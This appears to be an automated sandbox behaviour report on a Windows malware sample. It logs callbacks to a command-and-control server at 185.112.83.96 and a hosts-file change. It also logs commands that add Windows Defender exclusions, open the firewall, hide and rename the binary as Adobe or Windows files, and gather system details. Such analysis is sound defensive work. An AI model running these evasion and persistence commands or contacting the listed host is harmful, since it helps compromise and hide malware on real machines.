Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: acrotray.exe, acrotray.exe, 00000045.00000002.561046573.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://185.112.83.96:20000/callbackmheap.freeSpanLocked
Source: unknownHTTP traffic detected: POST /callback HTTP/1.1Host: 185.112.83.96:20000User-Agent: Go-http-client/1.1Content-Length: 60Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipData Raw: 63 61 6c 6c 62 61 63 6b 3d 48 6b 74 67 59 63 6e 6e 25 32 32 43 66 66 67 66 25 32 32 25 32 46 25 32 32 63 65 74 71 76 74 63 25 37 42 26 72 65 67 69 6e 66 6f 3d 57 75 67 74 4d 4b 56 Data Ascii: callback=HktgYcnn%22Cffgf%22%2F%22cetqvtc%7B&reginfo=WugtMKV

Spam, unwanted Advertisements and Ransom Demands:

barindex
Modifies the hosts fileShow sources
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: conhost.exeProcess created: 43
Source: cmd.exeProcess created: 44

System Summary:

barindex
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeFile created: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeFile deleted: C:\Windows\acrotray.exe:Zone.IdentifierJump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeFile created: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Mystic Entertainment" /f
Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeVirustotal: Detection: 20%
Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeReversingLabs: Detection: 39%
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe "C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe"
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /Q /C move /Y C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe C:\Windows\acrotray.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "ipconfig //flushdns"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /Q /C reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig //flushdns
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get name
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "attrib +S +H C:\Windows\acrotray.exe"
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +S +H C:\Windows\acrotray.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C ver
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\acrotray.exe "C:\Windows\acrotray.exe"
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd /Q /C move /Y C:\Windows\acrotray.exe C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\ipconfig.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd /Q /C reg add "HKCU\Software\Trion Softworks" /f
Source: C:\Windows\System32\ipconfig.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Trion Softworks" /f
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get name
Source: unknownProcess created: C:\Windows\acrotray.exe "C:\Windows\acrotray.exe"
Source: C:\Windows\System32\whoami.exeProcess created: C:\Windows\System32\cmd.exe cmd /Q /C move /Y C:\Windows\acrotray.exe C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe
Source: C:\Windows\System32\whoami.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\System32\whoami.exeProcess created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\whoami.exeProcess created: C:\Windows\System32\cmd.exe cmd /Q /C reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Windows\System32\whoami.exeProcess created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\System32\whoami.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\whoami.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd /C ver
Source: C:\Windows\System32\whoami.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\System32\reg.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get name
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\whoami.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\System32\whoami.exeProcess created: C:\Windows\System32\cmd.exe cmd /C ver
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\whoami.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\whoami.exeProcess created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\whoami.exeProcess created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\whoami.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /Q /C move /Y C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe C:\Windows\acrotray.exeJump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C whoamiJump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes"Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C whoamiJump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "ipconfig //flushdns"Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /Q /C reg add "HKCU\Software\Mystic Entertainment" /fJump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "attrib +S +H C:\Windows\acrotray.exe"Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C verJump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\TempJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoamiJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yesJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoamiJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig //flushdnsJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Mystic Entertainment" /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get nameJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +S +H C:\Windows\acrotray.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /Q /C move /Y C:\Windows\acrotray.exe C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /Q /C reg add "HKCU\Software\Trion Softworks" /f
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe"
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C ver
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Trion Softworks" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get name
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /Q /C move /Y C:\Windows\acrotray.exe C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /Q /C reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe"
